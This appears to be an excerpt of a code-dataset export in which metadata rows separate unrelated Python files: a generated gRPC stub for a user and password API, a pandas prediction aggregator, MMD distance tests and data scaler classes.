@abstractmethod
def all(self): pass
@abstractmethod
def delete(self): pass
@abstractmethod
def flash(self): pass
@abstractmethod
def reset(self): pass
@abstractmethod
def helper(self): pass
| 15.172414
| 35
| 0.652273
| 48
| 440
| 5.979167
| 0.354167
| 0.473868
| 0.536585
| 0.609756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265909
| 440
| 28
| 36
| 15.714286
| 0.888545
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0.055556
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
f487832f5b5a637e81a3ed4db05271ba75164b67
| 12,708
|
py
|
Python
|
python/src/toit/api/user_pb2_grpc.py
|
toitware/ap
|
4b72d7ed43efe6b7e79bee1bfb5a9fc81fa16edb
|
[
"MIT"
] | 7
|
2020-03-20T14:10:53.000Z
|
2021-11-28T04:05:24.000Z
|
python/src/toit/api/user_pb2_grpc.py
|
toitware/ap
|
4b72d7ed43efe6b7e79bee1bfb5a9fc81fa16edb
|
[
"MIT"
] | 9
|
2020-03-19T06:54:17.000Z
|
2022-03-17T05:07:00.000Z
|
python/src/toit/api/user_pb2_grpc.py
|
toitware/ap
|
4b72d7ed43efe6b7e79bee1bfb5a9fc81fa16edb
|
[
"MIT"
] | 1
|
2021-08-15T16:31:07.000Z
|
2021-08-15T16:31:07.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from toit.api import organization_pb2 as toit_dot_api_dot_organization__pb2
from toit.api import user_pb2 as toit_dot_api_dot_user__pb2
class UserStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.SetPassword = channel.unary_unary(
'/toit.api.User/SetPassword',
request_serializer=toit_dot_api_dot_user__pb2.SetPasswordRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.SetPasswordResponse.FromString,
)
self.InitiateResetPassword = channel.unary_unary(
'/toit.api.User/InitiateResetPassword',
request_serializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordResponse.FromString,
)
self.ChangePasswordWithRPToken = channel.unary_unary(
'/toit.api.User/ChangePasswordWithRPToken',
request_serializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenResponse.FromString,
)
self.GetCurrentUser = channel.unary_unary(
'/toit.api.User/GetCurrentUser',
request_serializer=toit_dot_api_dot_user__pb2.GetCurrentUserRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.GetCurrentUserResponse.FromString,
)
self.ListOrganizations = channel.unary_unary(
'/toit.api.User/ListOrganizations',
request_serializer=toit_dot_api_dot_user__pb2.ListOrganizationsRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.ListOrganizationsResponse.FromString,
)
self.ListUsers = channel.unary_unary(
'/toit.api.User/ListUsers',
request_serializer=toit_dot_api_dot_organization__pb2.ListUsersRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_organization__pb2.ListUsersResponse.FromString,
)
self.CreateUser = channel.unary_unary(
'/toit.api.User/CreateUser',
request_serializer=toit_dot_api_dot_organization__pb2.CreateUserRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_organization__pb2.CreateUserResponse.FromString,
)
class UserServicer(object):
"""Missing associated documentation comment in .proto file."""
def SetPassword(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InitiateResetPassword(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ChangePasswordWithRPToken(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetCurrentUser(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOrganizations(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListUsers(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateUser(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_UserServicer_to_server(servicer, server):
rpc_method_handlers = {
'SetPassword': grpc.unary_unary_rpc_method_handler(
servicer.SetPassword,
request_deserializer=toit_dot_api_dot_user__pb2.SetPasswordRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.SetPasswordResponse.SerializeToString,
),
'InitiateResetPassword': grpc.unary_unary_rpc_method_handler(
servicer.InitiateResetPassword,
request_deserializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordResponse.SerializeToString,
),
'ChangePasswordWithRPToken': grpc.unary_unary_rpc_method_handler(
servicer.ChangePasswordWithRPToken,
request_deserializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenResponse.SerializeToString,
),
'GetCurrentUser': grpc.unary_unary_rpc_method_handler(
servicer.GetCurrentUser,
request_deserializer=toit_dot_api_dot_user__pb2.GetCurrentUserRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.GetCurrentUserResponse.SerializeToString,
),
'ListOrganizations': grpc.unary_unary_rpc_method_handler(
servicer.ListOrganizations,
request_deserializer=toit_dot_api_dot_user__pb2.ListOrganizationsRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.ListOrganizationsResponse.SerializeToString,
),
'ListUsers': grpc.unary_unary_rpc_method_handler(
servicer.ListUsers,
request_deserializer=toit_dot_api_dot_organization__pb2.ListUsersRequest.FromString,
response_serializer=toit_dot_api_dot_organization__pb2.ListUsersResponse.SerializeToString,
),
'CreateUser': grpc.unary_unary_rpc_method_handler(
servicer.CreateUser,
request_deserializer=toit_dot_api_dot_organization__pb2.CreateUserRequest.FromString,
response_serializer=toit_dot_api_dot_organization__pb2.CreateUserResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'toit.api.User', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class User(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def SetPassword(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/SetPassword',
toit_dot_api_dot_user__pb2.SetPasswordRequest.SerializeToString,
toit_dot_api_dot_user__pb2.SetPasswordResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InitiateResetPassword(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/InitiateResetPassword',
toit_dot_api_dot_user__pb2.InitiateResetPasswordRequest.SerializeToString,
toit_dot_api_dot_user__pb2.InitiateResetPasswordResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ChangePasswordWithRPToken(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/ChangePasswordWithRPToken',
toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenRequest.SerializeToString,
toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetCurrentUser(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/GetCurrentUser',
toit_dot_api_dot_user__pb2.GetCurrentUserRequest.SerializeToString,
toit_dot_api_dot_user__pb2.GetCurrentUserResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOrganizations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/ListOrganizations',
toit_dot_api_dot_user__pb2.ListOrganizationsRequest.SerializeToString,
toit_dot_api_dot_user__pb2.ListOrganizationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListUsers(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/ListUsers',
toit_dot_api_dot_organization__pb2.ListUsersRequest.SerializeToString,
toit_dot_api_dot_organization__pb2.ListUsersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateUser(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/CreateUser',
toit_dot_api_dot_organization__pb2.CreateUserRequest.SerializeToString,
toit_dot_api_dot_organization__pb2.CreateUserResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 47.774436
| 119
| 0.681933
| 1,176
| 12,708
| 7.007653
| 0.095238
| 0.037374
| 0.053392
| 0.069409
| 0.832909
| 0.832909
| 0.802087
| 0.731101
| 0.517898
| 0.410994
| 0
| 0.004814
| 0.248033
| 12,708
| 265
| 120
| 47.954717
| 0.857576
| 0.062952
| 0
| 0.502242
| 1
| 0
| 0.073259
| 0.03976
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071749
| false
| 0.174888
| 0.013453
| 0.03139
| 0.130045
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
beafbae1e81abbe53ec1c0797f1ed6abd52a8675
| 37
|
py
|
Python
|
python/GMatNonLinearElastic/__init__.py
|
tdegeus/GMatNonLinearElastic
|
265463cd772ac318bee33a7705b7126ee53d59df
|
[
"MIT"
] | null | null | null |
python/GMatNonLinearElastic/__init__.py
|
tdegeus/GMatNonLinearElastic
|
265463cd772ac318bee33a7705b7126ee53d59df
|
[
"MIT"
] | 14
|
2019-04-11T14:16:36.000Z
|
2021-08-30T07:09:50.000Z
|
python/GMatNonLinearElastic/__init__.py
|
tdegeus/GMatNonLinearElastic
|
265463cd772ac318bee33a7705b7126ee53d59df
|
[
"MIT"
] | null | null | null |
from ._GMatNonLinearElastic import *
| 18.5
| 36
| 0.837838
| 3
| 37
| 10
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bec050b50bcd70d20a5ae670e1f7f6d4ab972f79
| 15
|
py
|
Python
|
tasks/EPAM/python_course/foundation-python/l8/m8-5.py
|
AleksNeStu/projects
|
1a4c68dfbdcb77228f0f3617e58fd18fcb1f5dbb
|
[
"Apache-2.0"
] | 2
|
2022-01-19T18:01:35.000Z
|
2022-02-06T06:54:38.000Z
|
tasks/EPAM/python_course/foundation-python/l8/m8-5.py
|
AleksNeStu/projects
|
1a4c68dfbdcb77228f0f3617e58fd18fcb1f5dbb
|
[
"Apache-2.0"
] | null | null | null |
tasks/EPAM/python_course/foundation-python/l8/m8-5.py
|
AleksNeStu/projects
|
1a4c68dfbdcb77228f0f3617e58fd18fcb1f5dbb
|
[
"Apache-2.0"
] | null | null | null |
"""Slide"""
| 3
| 11
| 0.333333
| 1
| 15
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 15
| 4
| 12
| 3.75
| 0.454545
| 0.333333
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fe3bba90c52421eab24a08a31fa6646de5a1200d
| 1,558
|
py
|
Python
|
inference-pipeline/inference_utils.py
|
w210-accessibility/classify-streetview
|
d60328484ea992b4cb2ffecb04bb548efaf06f1b
|
[
"MIT"
] | 2
|
2020-06-23T04:02:50.000Z
|
2022-02-08T00:59:24.000Z
|
inference-pipeline/inference_utils.py
|
w210-accessibility/classify-streetview
|
d60328484ea992b4cb2ffecb04bb548efaf06f1b
|
[
"MIT"
] | null | null | null |
inference-pipeline/inference_utils.py
|
w210-accessibility/classify-streetview
|
d60328484ea992b4cb2ffecb04bb548efaf06f1b
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
def aggregate_by_test_image(df_final):
# Get the img_id, heading and crop_num info
df_final[['img_id', 'heading', 'crop_num']] = df_final['jpg_name'].str.strip('.jpg').str.split('_', expand = True)
df_final['imgid_heading'] = df_final['img_id'].astype(str) + '_' + df_final['heading'].astype(str)
# Group based on image, prediction and ground_truth
df_group_final = df_final.groupby(['imgid_heading', 'prediction'])['jpg_name'].count()
df_group_final = df_group_final.reset_index()
df_group_final = df_group_final.sort_values(['imgid_heading', 'prediction'])
df_group_top_vote = df_group_final.drop_duplicates(subset = 'imgid_heading', keep = 'first')
return df_group_final, df_group_top_vote
def aggregate_by_image_with_groundtruth(df_final):
# Get the img_id, heading and crop_num info
df_final[['img_id', 'heading', 'crop_num']] = df_final['jpg_name'].str.strip('.jpg').str.split('_', expand = True)
df_final['imgid_heading'] = df_final['img_id'].astype(str) + '_' + df_final['heading'].astype(str)
# Group based on image, prediction and ground_truth
df_group_final = df_final.groupby(['imgid_heading', 'prediction', 'ground_truth'])['jpg_name'].count()
df_group_final = df_group_final.reset_index()
df_group_final = df_group_final.sort_values(['imgid_heading', 'prediction'])
df_group_top_vote = df_group_final.drop_duplicates(subset = 'imgid_heading', keep = 'first')
return df_group_final, df_group_top_vote
| 47.212121
| 118
| 0.712452
| 229
| 1,558
| 4.427948
| 0.227074
| 0.12426
| 0.16568
| 0.110454
| 0.90927
| 0.90927
| 0.90927
| 0.90927
| 0.90927
| 0.90927
| 0
| 0
| 0.148267
| 1,558
| 33
| 119
| 47.212121
| 0.76413
| 0.117458
| 0
| 0.666667
| 0
| 0
| 0.202772
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
22891c7338ca5ed8e6abcb7e14901a6b56c14ee9
| 5,704
|
py
|
Python
|
tests/test_mmd.py
|
imsb-uke/discern
|
064859763ece154c410f3e34a3189756c750d651
|
[
"MIT"
] | null | null | null |
tests/test_mmd.py
|
imsb-uke/discern
|
064859763ece154c410f3e34a3189756c750d651
|
[
"MIT"
] | null | null | null |
tests/test_mmd.py
|
imsb-uke/discern
|
064859763ece154c410f3e34a3189756c750d651
|
[
"MIT"
] | null | null | null |
"""Test mmd related functions."""
import numpy as np
import pytest
from sklearn.metrics.pairwise import euclidean_distances
from discern.mmd import mmd
def _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma):
# pylint: disable=too-many-locals
stat = np.zeros_like(scales)
n_x = np.float(dist_xx.shape[0])
n_y = np.float(dist_yy.shape[0])
for i, k in enumerate(scales):
val = k * sigma
k_xx = np.exp(-dist_xx / (2 * val))
np.fill_diagonal(k_xx, 0.0)
k_xxnd = np.sum(k_xx) / (n_x * n_x - n_x)
k_yy = np.exp(-dist_yy / (2 * val))
np.fill_diagonal(k_yy, 0.0)
k_yynd = np.sum(k_yy) / (n_y * n_y - n_y)
res1 = k_xxnd + k_yynd
res2 = np.exp(-dist_xy / (2 * val))
res2 = np.sum(res2) * 2. / (n_x * n_y)
stat[i] = res1 - res2
return np.max(stat)
@pytest.mark.parametrize("n_rows", [10, 25, 100, 500, 1000])
@pytest.mark.parametrize("n_cols", [10, 25, 100, 500, 1000])
def test_calculate_distances(n_rows, n_cols):
"""Test _calculate_distances function."""
x = np.random.rand(n_rows, n_cols) # pylint: disable=invalid-name
y = np.random.rand(n_rows, n_cols) # pylint: disable=invalid-name
expected = (euclidean_distances(x, y)**2, euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
got = mmd._calculate_distances(x, y) # pylint: disable=protected-access
np.testing.assert_allclose(got[0], expected[0])
np.testing.assert_allclose(got[1], expected[1])
np.testing.assert_allclose(got[2], expected[2])
@pytest.mark.parametrize("shape", [25, 100, 500, 1000])
@pytest.mark.parametrize("sigma", [0.1, 1., 5., 7.5, 15.])
def test_mmd_loop_py(shape, sigma):
"""Test _mmd_loop_py function."""
x = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(sigma)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_py(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
@pytest.mark.parametrize(
"shape", (1000, 2000, pytest.param(4000, marks=pytest.mark.slow)))
def test_mmd_loop_py_unbalanced(shape):
"""Test _mmd_loop_py function."""
x = np.random.rand(100, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(6.)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_py(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
@pytest.mark.skipif(not mmd.USE_C_IMPLEMENTATION,
reason="Testing C version required compiled binary")
@pytest.mark.parametrize("shape", [25, 100, 500, 1000])
@pytest.mark.parametrize("sigma", [0.1, 1., 5., 7.5, 15.])
def test_mmd_loop_c_version(shape, sigma):
"""Test _mmd_loop function."""
x = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(sigma)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_c(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
@pytest.mark.skipif(not mmd.USE_C_IMPLEMENTATION,
reason="Testing C version required compiled binary")
@pytest.mark.parametrize(
"shape", (1000, 2000, pytest.param(4000, marks=pytest.mark.slow)))
def test_mmd_loop_c_version_unbalanced(shape):
"""Test _mmd_loop function."""
x = np.random.rand(100, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(6.)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_c(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
def test_mmd():
"""Test if mmd_loss throws exception."""
np.random.seed(42)
x = np.random.rand(1000, 500).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(950, 500).astype(np.float32) # pylint: disable=invalid-name
got = mmd.mmd_loss(x, y, 5.0)
np.testing.assert_allclose(got, 1.418614e-06, rtol=0.0018)
np.random.seed(None) # To re-seed the generator for different functions
| 47.932773
| 104
| 0.649194
| 869
| 5,704
| 4.0771
| 0.143844
| 0.066046
| 0.036692
| 0.04403
| 0.80271
| 0.773074
| 0.757832
| 0.732712
| 0.71352
| 0.69094
| 0
| 0.059018
| 0.203892
| 5,704
| 118
| 105
| 48.338983
| 0.721207
| 0.140077
| 0
| 0.557895
| 0
| 0
| 0.025974
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 1
| 0.073684
| false
| 0
| 0.042105
| 0
| 0.126316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
22e12a864506c768a8a3d083766b5b970f484401
| 12,214
|
py
|
Python
|
pipesnake/transformers/scaler.py
|
pierluigi-failla/pipesnake
|
db63e093d61470b5bc1f12baeec39688a9ea45f7
|
[
"MIT"
] | null | null | null |
pipesnake/transformers/scaler.py
|
pierluigi-failla/pipesnake
|
db63e093d61470b5bc1f12baeec39688a9ea45f7
|
[
"MIT"
] | null | null | null |
pipesnake/transformers/scaler.py
|
pierluigi-failla/pipesnake
|
db63e093d61470b5bc1f12baeec39688a9ea45f7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
import numpy
from pipesnake.base import Transformer
from pipesnake.base.utils import _check_cols
__all__ = [
'MinMaxScaler',
'StdScaler',
'MadScaler',
'UnitLenghtScaler',
]
class MinMaxScaler(Transformer):
"""Min max scaler.
This will scale the data (by columns) to fit [min; max] interval.
Args:
:param x_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param min_value: min value after scaling (default: `1.0`)
:param max_value: max value after scaling (default: `1.0`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this :class:`Transformer`
Examples:
>>> scaler = MinMaxScaler(x_cols=['x_1'], y_cols=['y_1'])
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
def __init__(self, x_cols=[], y_cols=[], min_value=-1.0, max_value=1.0, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.min_value = min_value
self.max_value = max_value
self._d = self.max_value - self.min_value
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': None, 'y': None}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
self._inverse_map['x'] = (_x[self.x_cols].min(), _x[self.x_cols].max())
_x[self.x_cols] = (_x[self.x_cols] - _x[self.x_cols].min()) / (
_x[self.x_cols].max() - _x[self.x_cols].min()) * self._d + self.min_value
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
self._inverse_map['y'] = (_y[self.y_cols].min(), _y[self.y_cols].max())
_y[self.y_cols] = (_y[self.y_cols] - _y[self.y_cols].min()) / (
_y[self.y_cols].max() - _y[self.y_cols].min()) * self._d + self.min_value
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_min, _max = self._inverse_map['x']
_x[self.x_cols] = (_x[self.x_cols] - self.min_value) / self._d * (_max - _min) + _min
return _x
def inverse_transform_y(self, y):
if len(self._y_cols) == 0:
return y
_y = y.copy()
_min, _max = self._inverse_map['y']
_y[self.y_cols] = (_y[self.y_cols] - self.min_value) / self._d * (_max - _min) + _min
return _y
class StdScaler(Transformer):
"""Standard deviation scaler.
This will scale the data (by columns) following x' = ( x - mean(X) ) / ( k * std(X) ).
Args:
:param x_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param k: is a scaling factor for the standard deviation (default: `3.0`)
:param skipna: exclude NA/null values when computing the result (default: `True`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this :class:`Transformer`
Examples:
>>> scaler = StdScaler(x_cols=['x_1'], y_cols=['y_1'])
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
def __init__(self, x_cols=[], y_cols=[], k=3.0, skipna=True, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.k = k
self.skipna = skipna
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': {}, 'y': {}}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_mean = _x[self.x_cols].mean(skipna=self.skipna)
_std = _x[self.x_cols].std(skipna=self.skipna)
self._inverse_map['x'] = (_mean, _std)
_x[self.x_cols] = (_x[self.x_cols] - _mean) / (self.k * _std)
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_mean = _y[self.y_cols].mean(skipna=self.skipna)
_std = _y[self.y_cols].std(skipna=self.skipna)
self._inverse_map['y'] = (_mean, _std)
_y[self.y_cols] = (_y[self.y_cols] - _mean) / (self.k * _std)
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_mean, _std = self._inverse_map['x']
_x[self.x_cols] = _x[self.x_cols] * self.k * _std + _mean
return _x
def inverse_transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_mean, _std = self._inverse_map['y']
_y[self.y_cols] = _y[self.y_cols] * self.k * _std + _mean
return _y
class MadScaler(Transformer):
"""Median absolute deviation scaler.
This will scale the data (by columns) following x' = ( x - median(X) ) / ( k * mad(X) ).
Args:
:param x_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param k: is a scaling factor for the standard deviation (default: `3.0`)
:param skipna: exclude NA/null values when computing the result (default: `True`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this :class:`Transformer`
Examples:
>>> scaler = MadScaler(x_cols=['x_1'], y_cols=['y_1'])
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
